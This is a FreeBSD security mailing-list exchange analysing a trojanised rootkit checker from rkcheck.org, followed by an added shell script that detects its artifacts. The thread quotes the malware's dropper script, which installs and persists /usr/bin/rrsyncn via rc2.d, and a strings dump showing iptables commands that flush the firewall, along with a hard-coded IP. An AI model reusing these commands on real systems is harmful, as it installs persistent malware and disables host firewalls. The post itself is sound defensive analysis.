> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjli...@netzkommune.com> wrote:
>
> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org
> which was registered a few days ago and looks like a tampered version of
> chkrootkit. I hope nobody installed it anywhere, it seems to execute
> rkcheck/tests/.unit/test.sh which contains
>
> #!/bin/bash
>
> cp tests/.unit/test /usr/bin/rrsyncn
> chmod +x /usr/bin/rrsyncn
> rm -fr /etc/rc2.d/S98rsyncn
> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> /usr/bin/rrsyncn
> exit
>
> That doesn't look like something you'd want on your box…
I filed a report with Google about that domain (Google Safe Browsing), briefly describing what's been recounted here on this thread. It seems quite suspicious, agreed. Has anyone started an analysis of the rrsyncn binary? The last few lines of a simple string dump are interesting… take note of what looks to be an IP address of 95.215.44.195.

/bin/sh
iptables -X 2> /dev/null
iptables -F 2> /dev/null
iptables -t nat -F 2> /dev/null
iptables -t nat -X 2> /dev/null
iptables -t mangle -F 2> /dev/null
iptables -t mangle -X 2> /dev/null
iptables -P INPUT ACCEPT 2> /dev/null
iptables -P FORWARD ACCEPT 2> /dev/null
iptables -P OUTPUT ACCEPT 2> /dev/null
udevd
95.215.44.195
;*3$"

> Cheers,
>
> Philip

Chris
_______________________________________________
freebsd-security@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
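Added here as a defender's check, not code from the thread or from either poster: a POSIX sh script that looks for the artifacts the quoted test.sh and strings dump describe. The /usr/bin/rrsyncn path, the S98rsyncn symlink and the 95.215.44.195 address come from the thread; the function names, the ROOT argument and the saved-output FILE inputs are assumptions.

```shell
#!/bin/sh
# Added defender's check, not code from the thread. Paths, symlink name and
# address are those quoted in the thread; function names, the ROOT argument
# and the saved-output FILE inputs are assumptions.

RRSYNCN_BIN="usr/bin/rrsyncn"      # where test.sh copies tests/.unit/test
RRSYNCN_RC="etc/rc2.d/S98rsyncn"   # boot-time symlink test.sh creates
SUSPECT_IP="95.215.44.195"         # address seen in the strings dump

# Filesystem artifacts under ROOT (default /, or a mounted image).
# Returns 0 when none are present, 1 when at least one is found.
check_rrsyncn_files() {
    root="${1:-/}"; found=0
    if [ -e "$root/$RRSYNCN_BIN" ]; then
        echo "FOUND dropped binary: /$RRSYNCN_BIN"; found=1
    fi
    if [ -L "$root/$RRSYNCN_RC" ] || [ -e "$root/$RRSYNCN_RC" ]; then
        echo "FOUND rc2.d persistence: /$RRSYNCN_RC -> $(readlink "$root/$RRSYNCN_RC")"
        found=1
    fi
    return $found
}

# Saved command output (netstat -an, sockstat -4, ps auxww) in FILE is
# searched for the hard-coded address. Returns 1 when any line matches.
check_suspect_ip() {
    if grep -F -- "$SUSPECT_IP" "$1"; then
        echo "FOUND reference to $SUSPECT_IP in $1"
        return 1
    fi
    return 0
}

# An iptables-save dump in FILE is checked for the state the binary's
# iptables sequence leaves behind: filter table flushed, all three
# policies ACCEPT. A host that never had rules looks the same, so compare
# with a known-good dump. Returns 1 when the filter table is wide open.
check_iptables_dump() {
    filter=$(awk '/^\*filter$/{f=1;next} /^COMMIT$/{f=0} f' "$1")
    policies=$(printf '%s\n' "$filter" | grep -c -E '^:(INPUT|FORWARD|OUTPUT) ACCEPT' || true)
    rules=$(printf '%s\n' "$filter" | grep -c '^-A ' || true)
    if [ "$policies" -eq 3 ] && [ "$rules" -eq 0 ]; then
        echo "FOUND flushed filter table with ACCEPT policies in $1"
        return 1
    fi
    return 0
}

# Stand-alone use: sh check_rrsyncn.sh /   (or a mount point of an image)
if [ $# -gt 0 ]; then check_rrsyncn_files "$1"; fi
```

The three checks are independent so the iptables and address checks can run against output captured from a live host and saved elsewhere.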